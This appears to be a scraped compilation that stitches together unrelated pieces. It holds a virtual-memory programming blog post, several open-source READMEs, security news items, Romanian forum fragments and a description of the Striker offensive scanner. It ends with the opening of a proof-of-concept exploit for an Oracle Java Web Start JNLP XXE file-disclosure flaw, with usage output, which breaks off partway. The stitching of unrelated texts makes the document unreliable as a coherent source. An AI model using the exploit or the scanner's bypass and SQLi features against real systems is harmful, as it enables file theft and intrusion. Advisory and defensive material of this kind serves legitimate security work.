allocate_id(system_t *sys) { return sys->next_free_id++; } But virtual memory gives us another option. Instead of using integers as identifiers, we could use addresses reserved from the virtual memory system. This allows us to create IDs that are unique, not just in the current system, but throughout the entire application. And since we never actually use the memory pointed to by these addresses, we won’t consume any physical memory. It might look something like this: system_id_t *allocate_id(system_t *sys) { if (!sys->id_block || sys->id_block_used == PAGE_SIZE) { sys->id_block = virtual_alloc(PAGE_SIZE); sys->id_block_used = 0; } return (system_id_t *)(sys->id_block + sys->id_block_used++); } Note that by using a pointer to an opaque struct for the ID we also get some type safety, that we didn’t have with the uint64_t approach. Memory overwrite detection One of the hardest bugs to fix is random memory overwrites, where some piece of code is writing to memory that it shouldn’t touch. Then, later, when some other piece of code tries to use that memory, it will read that trash data and (most likely) crash. The problem here is that while the crash itself is easy to find, it is tricky to know where the bad write that corrupted the data to begin with occurred. Luckily, virtual memory can help us here too. To see why, first note that the term random memory overwrite is actually a misnomer. Just like regular space, address space is mostly empty. With a 64 bit address space and an application size of say 2 GB, the address space is 99.999999988 % empty. This means that if the memory overwrites were truly random, most likely they would hit this empty space and cause a page fault/access violation. That would give us a crash at the point of the bad write, instead of the innocent read, which would make the bug much easier to find and fix. But of course, the writes are usually not truly random. Instead they typically fall in one of two categories: Writing to memory that has been freed. Writing beyond the allocated memory for an object. In both cases, it is pretty likely that the write will actually hit some other object, rather than empty space. In the first case, the memory will probably have been recycled for something else. In the second case, the write will probably hit a neighboring object, or allocation block headers. We can make these cases look more like the random case by replacing the standard system allocator with an end-of-page allocator. Such an allocator uses the virtual memory system to allocate each object on its own set of pages, and furthermore, it aligns the object so that the end of the object coincides with the end of the last page. End of page block placement. This accomplishes two things. First, when we free the pages, we free them in the virtual memory system. This means that attempting to write to the pages after they have been freed will result in an access violation. Note that this typically doesn’t happen with a regular memory allocator — it will save the freed memory in its freelists to be used for other allocations, instead of returning it to the OS. Second, as the end of the block coincides with the end of the page, writing beyond the end of the block will also cause an access violation. In other words, with this approach, our typical bad memory writes will crash at the point of the write and allow us to easily diagnose the problem. Since this allocator rounds up all allocations to the page size, it will waste a lot of memory for small allocations. It is probably not something that you want enabled all the time. What I typically do is work with the standard allocator. Then, if I suspect bad memory overwrites, I switch it out for the end-of-page allocator. Once I’ve fixed the problem, I switch back to the standard allocator. This of course requires you to have an architecture where you can easily change which allocator your system is using. Writing an end end-of-page allocator is not complicated at all. Here’s what malloc looks like: void *eop_malloc(uint64_t size) { uint64_t pages = (size + PAGE_SIZE - 1) / PAGE_SIZE; char *base = virtual_alloc(pages * PAGE_SIZE); uint64_t offset = pages * PAGE_SIZE - size; return base + offset; } Note: There’s still bad writes that could go undetected with this approach. For example, after we’ve freed the pages, a new page allocation could happen in the same memory range. Also, it is possible that another set of pages could be allocated directly after ours in memory, in which case we wouldn’t detect overwrites beyond the last page. Both these problems can be fixed. For the first issue, we can leave the pages reserved, but not committed. That way, the physical memory is freed and we will get page faults, but the addresses are reserved and cannot be used by other objects. For the second issue, we could reserve an extra page after our pages, but not commit that page. No other object could then claim those addresses and writing to them would still cause an access violation. (Note: This only works on Windows, where reserve and commit are separate operations.) In practice though, I’ve never needed to take these extra precautions. For me, the basic end-of-page allocator has always been enough to find and fix the bugs. Fragment free memory allocation On old console hardware, memory fragmentation could give programmers nightmares. But even on modern machines, memory fragmentation can be a big problem when trying to implement efficient memory allocators. A memory allocator works by requesting big chunks of memory from the system and chopping them up into smaller pieces on request of the user. Memory fragmentation occurs when only some of those objects are freed, leaving holes in the used memory block: Memory fragmentation. The problem here is that if the user requests a big chunk of memory, none of the “holes” may be big enough. This means we have to allocate it from the free memory block at the end — increasing the memory use of the application. In other words, we have a lot of wasted memory that we can’t really use. In the olden days, memory was a precious resource. Today, it’s less so, but we still don’t want to waste it. Memory fragmentation is a huge topic, but instead of diving too deep into it, I’m just going to look at it from the virtual memory perspective, which is pretty simple. When you are allocating from virtual memory, fragmentation is a non-issue. The reason is that when we are using virtual memory, each page in address space is individually mapped to a page in physical memory. So if we create “holes” in physical memory by allocating and freeing pages, it doesn’t matter, because those “holes” can later be used to allocate what to us seems like contiguous memory. Let me try to illustrate it with a picture: Physical memory can't be fragmented by virtual memory allocations. Here, we have first made the red allocations and freed some of them, leaving holes in address space and physical memory. However, this doesn’t prevent us from making the big purple allocation. Each page in the purple allocation can be mapped to one of the hole pages we created earlier, without the need for allocating any more physical memory. So nothing is lost to fragmentation. Note that we still have fragmentation in the address space. I.e. we can’t make a big contiguous allocation in the address space where the red allocations are. But we can’t have any fragmentation in physical memory. Fragmentation in address space doesn’t really worry us, because as I said before, address space is typically 99.999999988 % empty anyway, so we have no problem finding contiguous address blocks. (On 32 bit systems, it’s a different story.) The drawback compared to using an ordinary allocator is that we have to round up the allocations to the page size, which typically is 4 K on modern systems. This rounding up means we are not using all of the available memory, a problem which is somewhat confusingly referred to as internal fragmentation. There are lots of ways of dealing with this. For fixed size objects we can use object pools — allocate a page of memory and divide it into as many objects will fit on that page. For dynamically growing buffers, we can just make the buffer size match the page size. This is a simple but interesting technique that I haven’t seen mentioned a lot. Say that you have an array of objects that are 300 bytes big. The conventional setup is that as you need more entries you grow the array geometrically by say doubling it in size. So you go from 16 to 32 to 64 to 128 elements. Geometrical growth is important because it means you only pay an amortized constant cost for adding an element to the array. However, 16 * 300 = 4800. If you allocate that from virtual memory, you have to round it up to 8 K, wasting almost an entire page. But we can easily fix that. Instead of focusing on the number of elements, we just grow the buffer by multiples of the page size: 4 K, 8 K, 16 K, 32 K, … and then put as many elements as will fit in there (13, 27, 54, 109, …). This is still geometric growth, so the cost is still amortized constant, but now the internal fragmentation is just 150 bytes on average, instead of 2 K. I find it a bit surprising that standard memory allocators don’t take more advantage of virtual memory to avoid fragmentation. Most allocators I’ve looked at still work by obtaining large chunks from the OS and chopping them up, instead of working with page sized virtual memory allocations. Is getting larger chunks from the OS more efficient? I’m heading into territory where my knowledge is pretty sketchy here, but I don’t think so. Using a larger page size can be more efficient, because it means a smaller page table and better use of the TLB cache. But, given a fixed page size, I don’t think it matters if you have one big or many small virtual memory allocations, because the address resolve is done page-by-page anyway. And even if you allocate large chunks, consecutive virtual pages are often not consecutive in physical memory anyway. There is probably some memory overhead for the OS to keep track of a large number of individual memory allocations. Also we need system calls to allocate and release the pages which will consume a little time. Maybe that’s the reason. Or maybe it’s just that general allocators are written to run in a variety of environments — on 32 bit systems or systems with large page sizes — so they can’t take advantage of the fragment free allocations you can get with 64 bit address space and 4 K pages. Gapless ring buffer This is a trick I found out about from Fabian Giesen’s blog, but the idea seems to have been around for longer. A ring buffer is a very useful data structure for any situation where data is produced and consumed at different rates. For example, when reading from a socket, you may receive data in chunks that do not match your packet size, so you need to buffer it until you have received a full packet. A ring buffer stores the data in an array of fixed size that “wraps around”, i.e. once the array has been filled we start writing data to the beginning of the array again. In addition to the array we also need read and write pointers to know where in the buffer to read and write data. I like to use uint64_t counters for this, specifying the total number of data written and read, something like this: enum {BUFFER_SIZE = 8*1024}; struct ring_buffer_t { uint8_t data[BUFFER_SIZE]; uint64_t read; uint64_t written; }; Note that since the buffer wraps around, we cannot let the write pointer run too far ahead of the read pointer or it will start to trash data that hasn’t been read yet. Basically, the BUFFER_SIZE controls how far ahead the writer can get. If the buffer is full, the writer must stall and wait for the reader. If the buffer is empty, the reader must stall and wait for the writer. (The number of bytes available to the reader is written - read.) A really annoying part of ring buffers is that you need special code to handle the wraparound. If it weren’t for this, writing to the buffer would be a simple memcpy, but instead we have to be careful that we do the right thing when the write straddles the wraparound point: void write(ring_buffer_t *rb, uint8_t *p, uint64_t n) { uint64_t offset = rb->written % BUFFER_SIZE; uint64_t space = BUFFER_SIZE - offset; uint64_t first_write = n < space ? n : space; memcpy(rb->data + offset, p, first_write); memcpy(rb->data, p + first_write, n - first_write); rb->written += n; } As annoying as this is, reading is even worse. If it wasn’t for the wraparound, reading wouldn’t even require any copying at all — we could just use the data directly from the buffer — but with the wraparound, we need two memcpy() calls to move the data to a contiguous memory block for further processing. How can virtual memory help here? We could use the “huge array” technique and just reserve a huge array instead of the ring buffer, commit pages as the writer advanced and decommit them as the reader advanced. With this we wouldn’t even need to set a fixed size for the array — it would just use as much memory as needed. Pretty ingenious. But note that you might need a huge array. To buffer a 1 Gbps network stream with an uptime of a year you will need to reserve 4 PB (petabytes) of memory. Sadly, as we saw above, 64-bit windows caps the virtual memory at 256 TB. Also, those commit and decommit calls aren’t free. But we can fix this in another way, by taking advantage of the fact that multiple virtual pages can be setup to resolve to the same physical page. This is usually used to share memory between different processes, but we can also set it up in a single process. To use this for the ring buffer we set up a set of pages, immediately after the ring buffer that point to the same physical memory: Ring buffer with page mapping. The shaded block appears twice. As you can see, with this setup the virtual memory system takes care of the wraparound for us. In the address space we can always find a contiguous copy of the memory in the ring buffer, even though the buffer is split up physically. The read and write functions become simply: void write(ring_buffer_t *rb, uint8_t *p, uint64_t n) { memcpy(rb->data + (rb->written % BUFFER_SIZE), p, n); rb->written += n; } uint8_t *read(ring_buffer_t *rb, uint64_t n) { uint8_t *p = rb->data + (rb->read % BUFFER_SIZE); rb->read += n; return p; } A lot nicer, and we’re still using the same amount of (physical) memory. Note that setting up this memory layout can be a bit tricky. On Windows you have to create a file mapping into virtual memory with CreateFileMapping() — yes, even though no files on disk are involved we still need a “file mapping” because that’s how virtual memory is shared. Since we don’t need a file on disk we use INVALID_HANDLE_VALUE for the file handle which creates a mapping against the page file. Then we use MapViewOfFileEx() to map that file mapping into two consecutive memory regions. Unfortunately, there is no way of guaranteeing that the memory regions we pass are available. We can reserve them, and then free them just before calling MapViewOfFileEx() , but that still leaves a window of time where if we’re super unlucky, someone else could come and allocate something in that address area. We might have to retry the mapping a few times before it succeeds, but after that setup we can use the buffer without worrying about it. And that’s all from me Do you know of any neat virtual memory tricks not mentioned here. Tweet them to me at @niklasfrykholm. Source: ourmachinery.com

The finest NBA CLI. The finest NBA CLI. Watch NBA live play-by-play, game preview, box score and player information on your console. Best CLI tool for who is both a NBA fans and Engineer. All data comes from stats.nba.com APIs. Install $ npm install -g nba-go Usage nba-go provides two main commands. game or g player or p Game There are two things to do. Check schedule. Choose one game which you want to watch. Depends on the status of the game you chose, it shows different result for you. There are three kinds of status may happened. Status Example Description Pregame It shows when the game starts. Selecting this will show the comparison between two teams, including average points, field goal percents, average assists, etc. Live It shows live game clock. Most powerful feature! Selecting this will show the live page which includes scoreboard, play-by-play and box score. Final Selecting this will show scoreboard, detailed box score, etc. Check schedule In order to show the schedule on some day. nba-go provides the command nba-go game with some options. Options -d <date> or --date <date> Enter a specific date to check the schedule on that day. $ nba-go game -d 2017/11/02 -y or --yesterday Check yesterday's schedule. $ nba-go game -y -t or --today Check today's schedule. $ nba-go game -t -T or --tomorrow Check tomorrow's schedule. $ nba-go game -T Pregame Check the detailed comparison data between two teams in the game. Live Best feature! Realtime updated play-by-play, scoreboard and box score. Turn on fullscreen mode for better experience. Btw, play-by-play is scrollable!. Final Check two teams' detailed scoreboard and box score. Player Get player's basic information, regular season data and playoffs data. Note. Must place player's name between nba-go player and options. Options -i or --info Get player's basic information. $ nba-go player Curry -i -r or --regular Get player's basic information. $ nba-go player Curry -r -p or --playoffs Get player's basic information. $ nba-go player Curry -p Mixed them all Get all data at the same time. $ nba-go player Curry -i -r -p Related repo: watch-nba nba-color License MIT Download: nba-go-master.zip or git clone https://github.com/xxhomey19/nba-go.git Sources: https://www.npmjs.com/package/nba-go https://github.com/xxhomey19/nba-go

Multiple online user reports claim that the MantisTek GK2 mechanical keyboard's configuration software is sending data to an Alibaba server. One of the reports even includes an analysis of the software’s traffic, which seems to include typed keys. The MantisTek GK2 is a cheap RGB mechanical keyboard from China that costs half as much (or less) as the mechanical keyboards from better known companies. Multiple gadgets that come from China seem to have either poor security or privacy issues caused by collecting user data without consumers' explicit permission. The MantisTek GK2 seems to be one of those products. The main issue seems to be caused by the keyboard’s “Cloud Driver,” which sends information to IP addresses tied to Alibaba servers. Alibaba sells cloud services, so the data isn’t necessarily being sent to Alibaba, the company, but to someone else using an Alibaba server. The data being sent—in plaintext, no less—has been identified as key presses. This should worry people who bought this keyboard, because that could include email addresses, logins, and even passwords they may have typed at one point or another. How To Stop The Keylogger The first way to stop the keyboard from sending your key presses to the Alibaba server is to ensure the MantisTek Cloud Driver software isn’t running in the background. The second method to stop the data collection is to block the CMS.exe executable in your firewall. You could do this by adding a new firewall rule for the MantisTek Cloud Driver in the “Windows Defender Firewall With Advanced Security.” If you want a one-click method, you can also download the free GlassWire network monitoring tool. GlassWire will show you all the apps making connections to the internet in the “Alerts” tab and let you block those connections in the “Firewall” tab. It can also be used for other types of connections, such as all the connections Windows 10 makes to Microsoft’s servers even when you have most or all data tracking disabled. These days, most products are made in China, but usually some other local company acts as an intermediary to ensure that the product is developed to specification and without other "features" that shouldn't be there. However, this additional protection goes out of the window when people decide to purchase directly from Chinese manufacturers via Chinese marketplaces. Not all products are going to have privacy or security issues, but extra caution is warranted. Via tomshardware.com

el e Tudor Dumitraș

http://www.wirelesshack.org/best-kali-linux-compatible-usb-adapter-dongles-2016.html Incearca aprox appUSB26DB, vine cu CD si support pentru WifiSlax,

Chalktalk is a digital presentation and communication language in development at New York University's Future Reality Lab. Using a blackboard-like interface, it allows a presenter to create and interact with animated digital sketches in order to demonstrate ideas and concepts in the context of a live presentation or conversation. Sketches can display animations and graphics in 2D and 3D… …link together to demonstrate complex logical connections and behaviors… …and even be coded live from within Chalktalk itself. A growing library of sketches--from creatures to math and physics objects--is available, and Chalktalk continues to evolve. Installation and Usage Installation instructions can be found in the wiki. More complete documentation on the usage of the system can be found there as well, but is a work in progress. Creating and Contribuiting Contributions to the core codebase and sketch library are welcome. To create your own sketch, create a new .js file (nameOfMySketch.js) or copy a template (from sketch_templates) into the sketches directory. In your file, change the value of this.label and begin customizing your new sketch. Further information on sketch creation can be found in the wiki. License MIT Download: chalktalk-master.zip or git clone https://github.com/kenperlin/chalktalk.git Source: https://github.com/kenperlin/chalktalk

Those are the words uttered by Tommy, a childhood toy robot of mine. I've taken a look at his miniature vinyl record sound mechanism a few times before (#1, #2), in an attempt to recover the analog audio signal using only a digital camera. Results were noisy at best. The blog posts resurfaced in a recent IRC discussion which inspired me to try my luck with a slightly improved method. Source photo I'm using a photo of Tommy's internal miniature record I already had from previous adventures. This way, Tommy is spared from another invasive operation, though it also means I don't have control over the photographing environment. The picture was taken with a DSLR and it's an uncompressed 8-bit color photo measuring 3000 by 3000 pixels. There's a fair amount of focus blur, chromatic aberration and similar distortions. But at this resolution, a clear pattern can be seen when zooming into the grooves. This pattern superficially resembles a variable-area optical audio track seen in old film prints, and that's why I previously tried to decode it as such. But it didn't produce satisfactory results, and there is no physical reason it even should. In fact, I'm not even sure as to which physical parameter the audio is encoded in – does the needle move vertically or horizontally? How would this feature manifest itself in the photograph? Do the bright blobs represent crests in the groove, or just areas that happen to be oriented the right way in this particular lighting? Unwrapping To make the grooves a little easier to follow I first unwrapped the circular record into a linear image. I did this by remapping the image space from polar to 9000-wide Cartesian coordinates and then resampling it with a windowed sinc kernel: Mapping the groove path It's not easy to automatically follow the groove. As one would imagine, it's not a mathematically perfect spiral. Sometimes the groove disappears into darkness, or blurs into the adjacent track. But it wasn't overly tedious to draw a guiding path manually. Most of the work was just copy-pasting from a previous groove and making small adjustments. I opened the unwrapped image in Inkscape and drew a colored polyline over all obvious grooves. I tried to make sure a polyline at the left image border would neatly continue where the previous one ended on the right side. The grooves were alternatively labeled as 'a' and 'b', since I knew this record had two different sound effects on interleaved tracks. This polyline was then exported from Inkscape and loaded by a script that extracted a 3-7 pixel high column from the unwrapped original, centered around the groove, for further processing. Pixels to audio I had noticed another information-carrying feature besides just the transverse area of the groove: its displacement from center. The white blobs sometimes appear below or above the imaginary center line. I had my script calculate the brightness mass center (weighted y average) relative to the track polyline at all x positions along the groove. This position was then directly used as a PCM sample value, and the whole groove was written to a WAV file. A noise reduction algorithm was also applied, based on sample noise from the silent end of the groove. The results are much better than what I previously obtained (see video below, or mp3 here): Future ideas Several factors limit the fidelity and dynamic range obtained by this method. For one, the relationship between the white blobs and needle movement is not known. The results could possibly still benefit from more pixel resolution and color bit depth. The blob central displacement (insofar as it is the most useful feature) could also be more accurately obtained using a Gaussian fit or similar algorithm. The groove guide could be drawn more carefully, as some track slips can be heard in the recovered audio. Opening up the robot for another photograph would be risky, since I already broke a plastic tab before. But other ways to optically capture the signal would be using a USB microscope or a flatbed scanner. These methods would still be only slightly more complicated that just using a microphone! The linear light source of the scanner would possibly cause problems with the circular groove. I would imagine the problem of the disappearing grooves would still be there, unless some sort of carefully controlled lighting was used. Source: http://www.windytan.com/2017/07/gramophone-audio-from-photograph.html

limecv is a (Xe/Lua)LaTeX document class to write curriculum vitæ. It is designed to match the business card I designed and follows the same design rules: simple, elegant and clean. The design of this document class is discussed in a series of blog posts. This document class is available on CTAN, so installation is very straightforward. A minimal working example for XeLaTeX can be found here. The documentation describes all possible options and features. The final layout should similar to the images below. The image on the right is the project icon. Installation The package is available from CTAN, to install this document class using your favourite package manager. After installing this package, make sure you have the following fonts installed: FontAwesome Fira The following packages need to be installed on your system. They are all available on CTAN: kvoptions, ifxetex, ifluatex, xparse, calc, xcolor, tabularx, hyperref, url, parskip, xstring, xkeyval, tikz, graphicx, fontspec (XeLaTeX and LuaLaTeX only) and fontawesome. Documentation The class documentation can be found on CTAN. Alternatively, the documentation can also be created by running pdflatex limecv.dtx. Examples To compile the examples in /examples/, install the package from CTAN or compile from source by running: pdflatex limecv.ins and copy the resulting limecv.cls file to the /examples/ folder. Roadmap Below is a list of upcoming features and important to-do items. After these have been resolved, the first stable release will be released. Publish to CTAN. Initial release. LuaLaTeX support. LaTeX support. Cleaned code. .dtx source code format. Real testing by third party. Licence LPPL v1.3c See LICENSE file. Default profile picture courtesy of Twitter. © 2017 Olivier Pieters Download: limecv-master.zip or git clone https://github.com/opieters/limecv.git Sources: https://olivierpieters.be/projects/limecv https://github.com/opieters/limecv

webpack-dashboard A CLI dashboard for your webpack dev server What's this all about? When using webpack, especially for a dev server, you are probably used to seeing something like this: That's cool, but it's mostly noise and scrolly and not super helpful. This plugin changes that. Now when you run your dev server, you basically work at NASA: Install npm install webpack-dashboard --save-dev Use First, import the plugin and add it to your webpack config, or apply it to your compiler: // Import the plugin: var DashboardPlugin = require('webpack-dashboard/plugin'); // If you aren't using express, add it to your webpack configs plugins section: plugins: [ new DashboardPlugin() ] // If you are using an express based dev server, add it with compiler.apply compiler.apply(new DashboardPlugin()); If using a custom port, the port number must be included in the options object here, as well as passed using the -p flag in the call to webpack-dashboard. See how below: plugins: [ new DashboardPlugin({ port: 3001 }) ] In the latest version, you can either run your app, and run webpack-dashboard independently (by installing with npm install webpack-dashboard -g) or run webpack-dashboard from your package.json. So if your dev server start script previously looked like: "scripts": { "dev": "node index.js" } You would change that to: "scripts": { "dev": "webpack-dashboard -- node index.js" } Now you can just run your start script like normal, except now, you are awesome. Not that you weren't before. I'm just saying. More so. InspectPack and Node Environments Webpack Dashboard does additional analysis of individual module sizes, asset sizes, and any problems when your bundle is unminified and not in a production environment. The Webpack Plugin automatically adds pathinfo = true to your configuration’s output object. Environments are defined through the DefinePlugin with process.env["NODE_ENV"] being "production". Webpack Dashboard will produce a warning if a production configuration is run. Run it Finally, start your server using whatever command you have set up. Either you have npm run dev or npm start pointed at node devServer.js or something along those lines. Then, sit back and pretend you're an astronaut. Supported Operating Systems and Terminals macOS → Webpack Dashboard works in Terminal, iTerm 2, and Hyper. For mouse events, like scrolling, in Terminal you will need to ensure View → Enable Mouse Reporting is enabled. This is supported in macOS El Capitan, Sierra, and High Sierra. In iTerm 2, to select full rows of text hold the ⌥ Opt key. To select a block of text hold the ⌥ Opt + ⌘ Cmd key combination. Windows 10 → Webpack Dashboard works in Command Prompt, PowerShell, and Linux Subsystem for Windows. Mouse events are not supported at this time, as discussed further in the documentation of the underlying terminal library we use Blessed. The main log can be scrolled using the ↑, ↓, Page Up, and Page Down keys. Linux → Webpack Dashboard has been verified in the built-in terminal app for Debian-based Linux distributions such as Ubuntu or Mint. Mouse events and scrolling are supported automatically. To highlight or select lines hold the ⇧ Shift key. API webpack-dashboard (CLI) Options -c, --color [color] - Custom ANSI color for your dashboard -m, --minimal - Runs the dashboard in minimal mode -t, --title [title] - Set title of terminal window -p, --port [port] - Custom port for socket communication server Arguments [command] - The command you want to run, i.e. webpack-dashboard -- node index.js Webpack plugin Options host - Custom host for connection the socket client port - Custom port for connecting the socket client root - Custom full path to project root (where package.json + node_modules are if not in process.cwd()) handler - Plugin handler method, i.e. dashboard.setData Note: you can also just pass a function in as an argument, which then becomes the handler, i.e. new DashboardPlugin(dashboard.setData) Download: webpack-dashboard-master.zip or git clone https://github.com/FormidableLabs/webpack-dashboard.git Credits Module output deeply inspired by: https://github.com/robertknight/webpack-bundle-size-analyzer Error output deeply inspired by: https://github.com/facebookincubator/create-react-app Sources: https://medium.com/@wesharehoodies/webpack-dashboard-with-create-react-app-vue-cli-and-custom-configs-49166e1a69de https://github.com/FormidableLabs/webpack-dashboard

KRACK Detector is a Python script to detect possible KRACK attacks against client devices on your network. The script is meant to be run on the Access Point rather than the client devices. It listens on the Wi-Fi interface and waits for duplicate message 3 of the 4-way handshake. It then disconnects the suspected device, preventing it from sending any further sensitive data to the Access Point. KRACK Detector currently supports Linux Access Points with hostapd. It uses Python 2 for compatibility with older operating systems. No external Python packages are required. Usage: Run as root and pass the Wi-Fi interface as a single argument. It is important to use the actual Wi-Fi interface and not any bridge interface it connects to. python krack_detect.py wlan0 If you do not wish to disconnect suspected devices, use the -n flag python krack_detect.py -n wlan0 Known Issues Message 3 of the 4-way handshake might be retransmitted even if no attack is perfomed. In such a case the client device will be disconnected from the Wi-Fi network. Some client devices will take some time to re-authenticate themselves, losing the Wi-Fi connection for a few seconds. Download: krackdetector-master.zip Mirror: krack_detect.py Sources: https://krackattacks.securingsam.com https://github.com/securingsam/krackdetector

https://www.codeproject.com/articles/19623/adding-automatic-updates-to-your-program-part

pentru?, ne spui si noua?

Guess what's more expensive than counterfeit United States passports, stolen credit cards and even guns on the dark web? It's digital code signing certificates. A recent study conducted by the Cyber Security Research Institute (CSRI) this week revealed that stolen digital code-signing certificates are readily available for anyone to purchase on the dark web for up to $1,200. As you may know, digital certificates issued by a trusted certificate authority (CA) are used to cryptographically sign computer applications and software, and are trusted by your computer for execution of those programs without any warning messages. However, malware author and hackers who are always in search of advanced techniques to bypass security solutions have been abusing trusted digital certificates during recent years. Hackers use compromised code signing certificates associated with trusted software vendors in order to sign their malicious code, reducing the possibility of their malware being detected on targeted enterprise networks and consumer devices. The infamous Stuxnet worm that targeted Iranian nuclear processing facilities in 2003 also used legitimate digital certificates. Also, the recent CCleaner-tainted downloads infection was made possible due to digitally-signed software update. Stealthy Digitally-Signed Malware Is Increasingly Prevalent However, separate research conducted by a team of security researchers have found that digitally signed malware has become much more common than previously thought. The trio researchers—Doowon Kim, BumJun Kwon and Tudor Dumitras from the University of Maryland, College Park—said they found a total of 325 signed malware samples, of which 189 (58.2%) carried valid digital signatures while 136 carry malformed digital signatures. Those 189 malware samples signed correctly were generated using 111 compromised unique certificates issued by recognized CAs and used to sign legitimate software. At the time of writing, 27 of these compromised certificates had been revoked, although malware signed by one of the remaining 84 certificates that were not revoked would still be trusted as long as carry a trusted timestamp. The researchers have released a list of the abusive certificates at signedmalware.org. Revoking Stolen Certificate Doesn't Stop Malware Immediately Even when a signature is not valid, the researchers found that at least 34 anti-virus products failed to check the certificate's validity, eventually allowing malicious code to run on the targeted system. The researchers also conducted an experiment to determine if malformed signatures can affect the anti-virus detections. To demonstrate this, they downloaded 5 random unsigned ransomware samples that almost all anti-virus programs detected as malicious. The trio then took two expired certificates that previously had been used to sign both legitimate software and in-the-wild malware and used them to sign each of the five ransomware samples. Top Antivirus Fail to Detect Malware Signed With Stolen Certificates When analysing the resulting ten new samples, the researchers found that many anti-virus products failed to detect the malware as malicious. The top three anti-virus products—nProtect, Tencent, and Paloalto—detected unsigned ransomware samples as malware, but considered eight of out ten crafted samples as benign. Even popular anti-virus engines from Kaspersky Labs, Microsoft, TrendMicro, Symantec, and Commodo, failed to detect some of the known malicious samples. Other affected anti-virus packages included CrowdStrike, Fortinet, Avira, Malwarebytes, SentinelOne, Sophos, TrendMicro and Qihoo, among others. The researchers said they reported this issue to the affected antivirus companies, and one of them had confirmed that their product fails to check the signatures correctly and they had planned to fix the issue. The researchers presented their findings at the Computer and Communications Security (CCS) conference in Dallas on Wednesday. For more detailed information on the research, you can head on to their research paper [PDF] titled "Certified Malware: Measuring Breaches of Trust in the Windows Code-Signing PKI." Via thehackernews.com

HouseProxy Protect your parents from phishing, HTTP proxy focused on block phishing URL's Install git clone https://github.com/mthbernardes/HouseProxy.git cd HouseProxy/ pip install -r requeriments.txt Config Edit etc/HouseProxy.conf to change de default user and password Create a entry in your DNS to house.proxy Usage $ hug -f index.py $ sudo echo "localhost house.proxy" >> /etc/hosts Set the house.proxy:3128 as your proxy Open the browser and access http://house.proxy:8000 Click in update blacklists It my take a while, the tool is downloading blacklists from phishitank and openphish. Done, now just try to access a malicious URL. Usage recomendation Install it on a raspberry pi, create a network, force all http traffics to pass through the pi on 3128 port (transparent proxy), and connect the clients to this network Download: HouseProxy-master.zip Source: github.com/mthbernardes/

Striker is an offensive information and vulnerability scanner Features Just supply a domain name to Striker and it will automatically do the following for you: Check and Bypass Cloudflare Retrieve Server and Powered by Headers Fingerprint the operating system of Web Server Detect CMS (197+ CMSs are supported) Launch WPScan if target is using Wordpress Retrieve robots.txt Check if the target is a honeypot Port Scan with banner grabbing Dumps all kind of DNS records Generate a map for visualizing the attack surface Gather Emails related to the target Find websites hosted on the same web server Find hosts using google Crawl the website for URLs having parameters SQLi scan using online implemention of SQLMap (takes < 3 min.) Basic XSS scanning Screenshots Want to see what else it can do? Try it yourself. Contriubute If you want to contribute to this project, report any bugs you encounter and help me add more features to it. Download: Striker-master.zip or git clone https://github.com/UltimateHackers/Striker.git Sources: https://github.com/UltimateHackers/Striker https://teamultimate.in

//solved

If you follow us on Twitter, you must be aware that since yesterday we have been warning Mac and Linux users of the Tor anonymity browser about a critical vulnerability that could leak their real IP addresses to potential attackers when they visit certain types of web pages. Discovered by Italian security researcher Filippo Cavallarin, the vulnerability resides in FireFox that eventually also affects Tor Browser, since the privacy-aware service that allows users to surf the web anonymously uses FireFox at its core. Dubbed by the researcher as TorMoil, the vulnerability affects Tor browser for macOS and Linux and not for Windows, but keeping in mind the security and privacy of Tor users, details about this flaw has not been yet publicly revealed. Cavallarin, CEO of the security firm We Are Segment, privately reported the security vulnerability to Tor developers on Thursday (October 26), and the Tor developers have rolled out an emergency update Tor version 7.0.8. According to a short blog post published Tuesday by We Are Segment, the TorMoil vulnerability is due to a Firefox issue in "handling file:// URLs." TorMoil is triggered when users click on links that begin with file:// addresses, instead of the more common https:// and http:// addresses. "Once an affected user [running macOS or Linux system] navigates to a specially crafted web page, the operating system may directly connect to the remote host, bypassing Tor Browser." he Tor Project has currently issued a temporary workaround to prevent the real IP leakage. So, macOS and Linux users may found the updated versions of the Tor anonymity browser not behaving properly while navigating to file:// addresses, until a permanent patch becomes available. "Opening those in a new tab or new window does not work either. A workaround for those issues is dragging the link into the URL bar or on a tab instead. We track this follow-up regression in bug 24136." According to the Tor Project, users of both the Windows versions of Tor, Tails and the sandboxed-tor-browser that's in alpha testing are not affected. The Tor Project also said there's no evidence the TorMoil vulnerability has been actively exploited by hackers to obtain the IP addresses of Tor users. However, lack of evidence does not prove the bug was not exploited by nation-state attackers and skilled hackers, given the high-demand of Tor zero-day exploit in the market, where Zerodium is ready to pay anyone $1 Million for its exploit. In an attempt to keep its users' privacy protected, the Tor Project has recently announced the release of Tor 0.3.2.1-alpha that includes support for the next generation onion services, with the integration of new cutting-edge encryption and improvement of overall authentication into its web service. Via thehackernews.com

Oracle Java SE installs a protocol handler in the registry as "HKEY_CLASSES_ROOT\jnlp\Shell\Open\Command\Default" 'C:\Program Files\Java\jre1.8.0_131\bin\jp2launcher.exe" -securejws "%1"'. This can allow allow an attacker to launch remote jnlp files with little user interaction. A malicious jnlp file containing a crafted XML XXE attack can be leveraged to disclose files, cause a denial of service or trigger SSRF. Versions v8u131 and below are affected. #!/usr/local/bin/python """ Oracle Java SE Web Start jnlp XML External Entity Processing Information Disclosure Vulnerability Affected: <= v8u131 File: jre-8u131-windows-i586-iftw.exe SHA1: 85f0de19845deef89cc5a29edebe5bb33023062d Download: http://www.oracle.com/technetwork/java/javase/downloads/jre8-downloads-2133155.html References: SRC-2017-0028 / CVE-2017-10309 Advisory: http://srcincite.io/advisories/src-2017-0028/ Vulnerability Details: ====================== Java SE installs a protocol handler in the registry as "HKEY_CLASSES_ROOT\jnlp\Shell\Open\Command\Default" 'C:\Program Files\Java\jre1.8.0_131\bin\jp2launcher.exe" -securejws "%1"'. This can allow allow an attacker to launch remote jnlp files with little user interaction. A malicious jnlp file containing a crafted XML XXE attack to be leveraged to disclose files, cause a denial of service or trigger SSRF. Notes: ====== - It will take a few seconds to fire. - Some browsers will give a small, innocent looking popup (not a security alert), but IE/Edge doesn't at all. Example: ======== saturn:~ mr_me$ ./poc.py Oracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability mr_me 2017 (+) usage: ./poc.py <file> (+) eg: ./poc.py 'C:/Program Files/Java/jre1.8.0_131/README.txt' saturn:~ mr_me$ ./poc.py 'C:/Program Files/Java/jre1.8.0_131/README.txt' Oracle Java Web Start JNLP XML External Entity Processing Information Disclosure Vulnerability mr_me 2017 (+) select your interface: lo0, gif0, stf0, en0, en1, en2, bridge0, p2p0, awdl0, vmnet1, vmnet8, 